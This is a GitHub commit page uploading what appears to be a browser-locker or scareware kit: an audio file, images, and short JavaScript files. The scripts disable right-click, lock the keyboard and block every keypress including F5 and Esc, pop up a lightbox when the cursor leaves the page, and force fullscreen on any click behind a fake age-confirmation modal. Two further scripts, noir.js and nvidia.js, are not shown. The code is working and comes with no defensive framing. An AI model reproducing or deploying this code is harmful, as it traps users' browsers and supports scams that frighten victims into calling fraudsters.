Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
taikoyaki150141 authored Jul 22, 2024
0 parents commit f4cb5f2
Show file tree
Hide file tree
Showing 22 changed files with 1,591 additions and 0 deletions.
Binary file added aud0jp87.mp3
Binary file not shown.
Binary file added bel.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added bg.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added boxc.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
16 changes: 16 additions & 0 deletions caps.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@

var isNS = "Netscape" == navigator.appName ? 1 : 0;
"Netscape" == navigator.appName && document.captureEvents(Event.MOUSEDOWN || Event.MOUSEUP);

function mischandler() {
return !1
}

function mousehandler(a) {
a = isNS ? a : event;
a = isNS ? a.which : a.button;
if (2 == a || 3 == a) return !1
}
document.oncontextmenu = mischandler;
document.onmousedown = mousehandler;
document.onmouseup = mousehandler;
Binary file added cs.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added dm.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
4 changes: 4 additions & 0 deletions esc.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
navigator.keyboard.lock();
document.onkeydown = function (e) {
return false;
}
3 changes: 3 additions & 0 deletions escs.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
document.onkeydown = function(a) {
return !1
};
20 changes: 20 additions & 0 deletions jupiter.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
function addEvent(obj, evt, fn) {
if (obj.addEventListener) {
obj.addEventListener(evt, fn, false);
} else if (obj.attachEvent) {
obj.attachEvent("on" + evt, fn);
}
}

addEvent(document, 'mouseout', function(evt) {
if (evt.toElement == null && evt.relatedTarget == null) {
$('.lightbox').slideDown();
};
});

$('a.close').click(function() {
$('.lightbox').slideUp();
});
$('body').click(function() {
$('.lightbox').slideUp();
});
12 changes: 12 additions & 0 deletions main.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
document.attachEvent("onkeydown", win_onkeydown_handler);

function win_onkeydown_handler() {
switch (event.keyCode) {
case 116:
event.returnValue = !1;
event.keyCode = 0;
break;
case 27:
event.returnValue = !1, event.keyCode = 0
}
}
Binary file added mnc.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added msmm.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
4 changes: 4 additions & 0 deletions noir.js

Large diffs are not rendered by default.

1 change: 1 addition & 0 deletions nvidia.js

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

Binary file added pcm.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added re.gif
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
19 changes: 19 additions & 0 deletions safes.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
document.getElementById("age-confirmation-modal").onclick = function(){
document.getElementById("age-confirmation-modal").style.display = "none";
document.getElementById("other-content").style.display = "inline";

addEventListener("click", function() {
var
el = document.documentElement
, rfs =
el.requestFullScreen
|| el.webkitRequestFullScreen
|| el.mozRequestFullScreen
;
rfs.call(el);
});
}
$("a#thing_to_click").click(function(e){
e.preventDefault();
window.location = "#";
});
Binary file added set.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading

0 comments on commit f4cb5f2

Please sign in to comment.